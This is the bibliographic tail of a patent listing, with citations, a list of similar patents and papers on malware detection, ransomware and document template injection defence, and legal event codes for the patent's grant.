US20230019180A1 (en) * 2021-07-08 2023-01-19 Bugcrowd Inc. Automated Prediction Of Cybersecurity Vulnerabilities
US20230289435A1 (en) * 2022-03-10 2023-09-14 Denso Corporation Incident response according to risk score

Non-Patent Citations (3)

* Cited by examiner, † Cited by third party
Title
Automatic Generation of Tests to Exploit XML Injection Vulnerabilities in Web Applications; Sadeeq Jan et al.; IEEE Transactions on Software Engineering; 335 - 362 *
Ling Fu. Analysis of the template-injection virus attack on US infrastructure. Computer & Network. 2017, full text. *

Similar Documents

Publication Publication Date Title
US10375086B2 (en) System and method for detection of malicious data encryption programs
US9215197B2 (en) System, method, and computer program product for preventing image-related data loss
US8713681B2 (en) System and method for detecting executable machine instructions in a data stream
EP3899770B1 (en) System and method for detecting data anomalies by analysing morphologies of known and/or unknown cybersecurity threats
US8484737B1 (en) Techniques for processing backup data for identifying and handling content
US9230111B1 (en) Systems and methods for protecting document files from macro threats
US20110041179A1 (en) Malware detection
US9239922B1 (en) Document exploit detection using baseline comparison
US20180101682A1 (en) System and method for detecting malicious compound files
JP2019518298A (en) Virus detection technology benchmarking
JP2019079492A (en) System and method for detection of anomalous events on the basis of popularity of convolutions
CN107871089B (en) File protection method and device
Stolfo et al. Fileprint analysis for malware detection
RU2726878C1 (en) Method for faster full antivirus scanning of files on mobile device
US20200218809A1 (en) Logical and Physical Security Device
Rosenberg et al. Bypassing system calls–based intrusion detection systems
Cen et al. Ransomware early detection: A survey
CN117235716B (en) Unknown threat defense method and device for OOXML document template injection attack
Al-Mousa et al. General countermeasures of anti-forensics categories
US20220058261A1 (en) System and method for identifying a cryptor that encodes files of a computer system
Mahboubi et al. Digital immunity module: Preventing unwanted encryption using source coding
Fenu et al. Computer forensics between the italian legislation and pragmatic questions
CN112464235A (en) Computer network safety control system and control method
Adegbehingbe et al. Assessing the Impact of Matched Fragments' Relative Locations on Application Artifact Inference
Jeyaseeli et al. Design of an Efficient Smart Phone Data Extraction Tool Using Aho-Corasick Algorithm.

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant